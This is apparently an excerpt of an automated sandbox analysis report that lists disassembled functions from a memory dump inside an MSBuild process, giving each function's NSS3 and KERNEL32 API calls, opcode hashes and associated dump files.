Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
String ID:
API String ID: 1593870348-0
Opcode ID: 8aea2b4ff57291d3c9a03c2f6134240fd24b47c4f69bc739b0ecf9147b41f3ea
Instruction ID: 589890e4938de5f266032dada7600b290d38505ebbad70f9cec357d51d180ac0
Opcode Fuzzy Hash: 8aea2b4ff57291d3c9a03c2f6134240fd24b47c4f69bc739b0ecf9147b41f3ea
Instruction Fuzzy Hash: 085138B4A057868FDB00EF79C48466ABBF4FF45308F118969D899DB701EB30E484CB95

Function 6C6E25E0 Relevance: 12.1, APIs: 8, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C6E2610
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000), ref: 6C6E261F

Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C6E263B
_wopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,0000010A,00000000,?,000000FF,00000000,00000000), ref: 6C6E264A
free.MOZGLUE(00000000,?,?,00000000), ref: 6C6E2656
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C7CDEB8), ref: 6C6E2676
_close.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 6C6E2684
free.MOZGLUE(00000000,?,000000FF,00000000,00000000), ref: 6C6E268D

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_close_fdopen_wopenmalloc
String ID:
API String ID: 3511306438-0
Opcode ID: 5e789ecc2c4ecf665fc67668c26417520d8d139daca8730d2d31dd23ce5699bf
Instruction ID: eda71f65daba4dfedd5cd5411f4559ec2c0065345182e789da8fcf9e7a7293a7
Opcode Fuzzy Hash: 5e789ecc2c4ecf665fc67668c26417520d8d139daca8730d2d31dd23ce5699bf
Instruction Fuzzy Hash: D811B6B07062133BFB0427659C4EA7B3BBDEB85356F040639FC19C5681FE60D81086AA

Function 6C6F8C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6F8C93

Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

Part of subcall function 6C6D8A60: TlsGetValue.KERNEL32(6C6861C4,?,6C685F9C,00000000), ref: 6C6D8A81
Part of subcall function 6C6D8A60: TlsGetValue.KERNEL32(?,?,?,6C685F9C,00000000), ref: 6C6D8A9E
Part of subcall function 6C6D8A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C685F9C,00000000), ref: 6C6D8AB7
Part of subcall function 6C6D8A60: PR_Unlock.NSS3(?,?,?,?,?,6C685F9C,00000000), ref: 6C6D8AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6C6F8CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6C6F8D10

Part of subcall function 6C6D8970: TlsGetValue.KERNEL32(?,00000000,6C6861C4,?,6C685639,00000000), ref: 6C6D8991
Part of subcall function 6C6D8970: TlsGetValue.KERNEL32(?,?,?,?,?,6C685639,00000000), ref: 6C6D89AD
Part of subcall function 6C6D8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C685639,00000000), ref: 6C6D89C6
Part of subcall function 6C6D8970: PR_WaitCondVar.NSS3 ref: 6C6D89F7
Part of subcall function 6C6D8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C685639,00000000), ref: 6C6D8A0C

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID:
API String ID: 2412912262-0
Opcode ID: 86c0a0b2ca3745e4986ecd27baafeadad8c8b0619423011bb0cf2a468410bc80
Instruction ID: b4d2563d9361dd3f56535fbef3dde9a712c27fa583995c7207c0641e04793c74
Opcode Fuzzy Hash: 86c0a0b2ca3745e4986ecd27baafeadad8c8b0619423011bb0cf2a468410bc80
Instruction Fuzzy Hash: F9B191B0E003089FEB14CF65DC44AAEB7BAFF49308F10416ED81AA7751E731A956CB59

Function 6C6CAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C6CAB3E,?,?,?), ref: 6C6CAC35

Part of subcall function 6C6ACEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C6ACF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C6CAB3E,?,?,?), ref: 6C6CAC55

Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C6CAB3E,?,?), ref: 6C6CAC70

Part of subcall function 6C6AE300: TlsGetValue.KERNEL32 ref: 6C6AE33C
Part of subcall function 6C6AE300: EnterCriticalSection.KERNEL32(?), ref: 6C6AE350
Part of subcall function 6C6AE300: PR_Unlock.NSS3(?), ref: 6C6AE5BC
Part of subcall function 6C6AE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C6AE5CA
Part of subcall function 6C6AE300: TlsGetValue.KERNEL32 ref: 6C6AE5F2
Part of subcall function 6C6AE300: EnterCriticalSection.KERNEL32(?), ref: 6C6AE606
Part of subcall function 6C6AE300: PORT_Alloc_Util.NSS3(?), ref: 6C6AE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C6CAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6CAB3E), ref: 6C6CACD7
PORT_Alloc_Util.NSS3(?), ref: 6C6CAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C6CAD2B

Part of subcall function 6C6AF360: TlsGetValue.KERNEL32(00000000,?,6C6CA904,?), ref: 6C6AF38B
Part of subcall function 6C6AF360: EnterCriticalSection.KERNEL32(?,?,?,6C6CA904,?), ref: 6C6AF3A0
Part of subcall function 6C6AF360: PR_Unlock.NSS3(?,?,?,?,6C6CA904,?), ref: 6C6AF3D3

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 109d2711b0212024dfe46aa79d2a903e659e5df0587ebdd811e9506eedd80593
Instruction ID: 7a1ad5a4686c608eb20cdfcef41e5a60c3871837cbce09bd0ad196dd4dbe0bfc
Opcode Fuzzy Hash: 109d2711b0212024dfe46aa79d2a903e659e5df0587ebdd811e9506eedd80593
Instruction Fuzzy Hash: C8313BB1F006095FEB009F65CC409AF77B6EF8531CB188128E8159B741EB31ED15C7AA

Function 6C6A8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C6A8C7C

Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A8CB0
TlsGetValue.KERNEL32 ref: 6C6A8CD1
EnterCriticalSection.KERNEL32(?), ref: 6C6A8CE5
PR_Unlock.NSS3(?), ref: 6C6A8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C6A8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A8D93

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 6cbe00f4b3b28670fdf45f92c9e71adb0c25f8becdafc205ad5faff97c9e076b
Instruction ID: 6750ee5000de35a3bfd98fc2241821440adfa48caa5d964ef883aaa3c3ac44d7
Opcode Fuzzy Hash: 6cbe00f4b3b28670fdf45f92c9e71adb0c25f8becdafc205ad5faff97c9e076b
Instruction Fuzzy Hash: 92314871A00201AFE700AFA8DC487DAB7B4FF19318F140136EA1967B60D730AD25CBD5

Function 6C6C8500 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C6C95DC,00000000,00000000,00000000,?,6C6C95DC,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C8517

Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44

PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C8585
PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C859A
SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C7AD8C4,6C6C95D0,?,?,?,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C85CC
SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C85E1
PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6A7F4A,00000000,?), ref: 6C6C85F4

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
String ID:
API String ID: 738345241-0
Opcode ID: 73c6f2470d5523a2bf9ba9ead9652412b10f7893cd5950c6f1d0af966072ac46
Instruction ID: e058e3d1fa74c5303dbb5ab51fb07dbfdd1771a4fd1b6f317d0be41925a82bf3
Opcode Fuzzy Hash: 73c6f2470d5523a2bf9ba9ead9652412b10f7893cd5950c6f1d0af966072ac46
Instruction Fuzzy Hash: B53149A1F0520057F330451A8C50BAA3219EB2A39CF560677F905D7EF2EB14DD94826F

Function 6C694590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6945B5

Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B

PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C6945C9

Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C

memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6945E6
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6945F8

Part of subcall function 6C6DFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6D8D2D,?,00000000,?), ref: 6C6DFB85
Part of subcall function 6C6DFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6DFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C694647
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7AA0F4,?), ref: 6C69468C
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6946A1

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
String ID:
API String ID: 1594507116-0
Opcode ID: cd6db205908f73af521ff4079f7535f323eb0122419390e330757dbc10854959
Instruction ID: 81b1f8c954b8c1dd67d198c75db775887599e5dfc6ffe412995a81d8a2e100ff
Opcode Fuzzy Hash: cd6db205908f73af521ff4079f7535f323eb0122419390e330757dbc10854959
Instruction Fuzzy Hash: 1131D4B1A003155BFF104F68DC55BBB36A8AB46358F144039E914DF785EBB5D808C7AA

Function 6C6D4470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C697296,00000000), ref: 6C6D4487
EnterCriticalSection.KERNEL32(?,?,?,6C697296,00000000), ref: 6C6D44A0
PR_Unlock.NSS3(?,?,?,?,6C697296,00000000), ref: 6C6D44BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6C697296,00000000), ref: 6C6D44DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6C697296,00000000), ref: 6C6D4530
free.MOZGLUE(?,?,?,?,?,6C697296,00000000), ref: 6C6D453C
PORT_FreeArena_Util.NSS3 ref: 6C6D454F

Part of subcall function 6C6BCAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C69B1EE,D958E836,?,6C6D51C5), ref: 6C6BCAFA
Part of subcall function 6C6BCAA0: PR_UnloadLibrary.NSS3(?,6C6D51C5), ref: 6C6BCB09

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: c4be5c32bc82b32f2fc809cdc24b5869e606e25393f8af732e32e84fb1af3a2e
Instruction ID: 73bdee2eb0a837a541005823268db57bf23e324e93217448be045fce78997a7b
Opcode Fuzzy Hash: c4be5c32bc82b32f2fc809cdc24b5869e606e25393f8af732e32e84fb1af3a2e
Instruction Fuzzy Hash: F3315CB4A04A019FDB00AF38C088669B7F0FF09319F020669D89997B00E771FC94CBC9

Function 6C698C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C698C1B
EnterCriticalSection.KERNEL32 ref: 6C698C34
PL_ArenaAllocate.NSS3 ref: 6C698C65
PR_Unlock.NSS3 ref: 6C698C9C
PR_Unlock.NSS3 ref: 6C698CB6

Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4

Strings

KRAM, xrefs: 6C698C8F

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 032623890e364082208279cf464d0581570020ee12fb54e5d0941c519a53236a
Instruction ID: cd18f7683823401893ec913a4e604d078bc46979c038ae59dc60fc5550134b09
Opcode Fuzzy Hash: 032623890e364082208279cf464d0581570020ee12fb54e5d0941c519a53236a
Instruction Fuzzy Hash: B02153B1605A02CFDB00AF78C484559BBF4FF49318F15896ED888CB711EB35E895CB99

Function 6C72A540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6C72A390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72A415

PK11_ExtractKeyValue.NSS3(00000000), ref: 6C72A5AC
memcpy.VCRUNTIME140(?,?,?), ref: 6C72A5BF
PK11_FreeSymKey.NSS3(00000000), ref: 6C72A5C8

Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE10
Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE24
Part of subcall function 6C6CADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6AD079,00000000,00000001), ref: 6C6CAE5A
Part of subcall function 6C6CADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE6F
Part of subcall function 6C6CADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE7F
Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEB1
Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEC9

PK11_FreeSymKey.NSS3(00000000), ref: 6C72A5D9
PR_SetError.NSS3(FFFFD04C,00000000), ref: 6C72A5E8

Strings

*@, xrefs: 6C72A589

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
String ID: *@
API String ID: 2660593509-1483644743
Opcode ID: f5cf4653c909b951bfe98933c0ebab35cf59925333e8e3a843b7af40db9fb76a
Instruction ID: 89f65dd739ad31155dc3d7a78e03b1383eab73ea72d5d3a646e9bacea5a35466
Opcode Fuzzy Hash: f5cf4653c909b951bfe98933c0ebab35cf59925333e8e3a843b7af40db9fb76a
Instruction Fuzzy Hash: 352105B1D0020897C7009F2A9E0469FBBF4AF9972CF054228EC5863741EB74A6488BD7

Function 6C792C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C792CA0
PR_ExitMonitor.NSS3 ref: 6C792CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C792CD1
strdup.MOZGLUE(?), ref: 6C792CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C792D27

Strings

Loaded library %s (static lib), xrefs: 6C792D22

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 4323c534238fe5b31ebf386ad0fbdf28c4c4ad34421b78ecf88edd347f025338
Instruction ID: f8a22ee0489480c3c7c0c7612c278c98660c5a10e00b7635a4fc64a20b1b8632
Opcode Fuzzy Hash: 4323c534238fe5b31ebf386ad0fbdf28c4c4ad34421b78ecf88edd347f025338
Instruction Fuzzy Hash: AF11EBB67012009FEB509F15EA4966677B4EB4A31DF14853DDC09C7B52DB31E808CBA1

Function 6C710570 Relevance: 10.5, APIs: 7, Instructions: 47COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C6FC89B,FFFFFE80,?,6C6FC89B), ref: 6C71058B
free.MOZGLUE(?,?,6C6FC89B), ref: 6C710592
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C6FC89B), ref: 6C7105AE
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C6FC89B), ref: 6C7105C2
DeleteCriticalSection.KERNEL32(6C6FC89B,?,6C6FC89B), ref: 6C7105D8
free.MOZGLUE(?,?,6C6FC89B), ref: 6C7105DF
PR_SetError.NSS3(FFFFE09A,00000000,?,6C6FC89B), ref: 6C7105FB

